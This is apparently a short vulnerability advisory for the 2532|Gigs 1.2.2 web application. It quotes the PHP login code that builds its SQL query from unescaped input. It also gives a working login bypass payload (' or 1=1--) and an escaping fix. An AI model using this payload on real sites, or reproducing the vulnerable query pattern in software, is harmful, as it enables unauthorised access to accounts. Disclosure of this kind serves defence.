2532|Gigs version 1.2.2 Stable suffers from a remote login bypass vulnerability.
b92ec05691fb7744af74baaf967dbd0f4466361097ed62af77aef12cd8311c26
/* ------------------------------------------------------------------------------------------------
* 2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability
* ------------------------------------------------------------------------------------------------
* by athos - staker[at]hotmail[dot]it
* http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
* ------------------------------------------------------------------------------------------------
* File Vuln checkuser.php
*
* 16. $username = $_POST['username'];
* 17. $password = $_POST['password'];
* ...
* 41. $query = "SELECT * FROM $dbt_users WHERE username = '$username' AND password = '$password'" ;
* 42. $result = mysql_query($query) or die ( "Error in query: $query. " . mysql_error() );
* ------------------------------------------------------------------------------------------------
* Exploit
*
* http://[host]/[path]/index.php?id=login
*
* Username: [username]
* Password: [' or 1=1--]
* ------------------------------------------------------------------------------------------------
* Fix (Examples)
*
* $username = mysql_real_escape_string($_POST['username']);
* $password = mysql_real_escape_string($_POST['password']);
*
* ------------------------------------------------------------------------------------------------
*/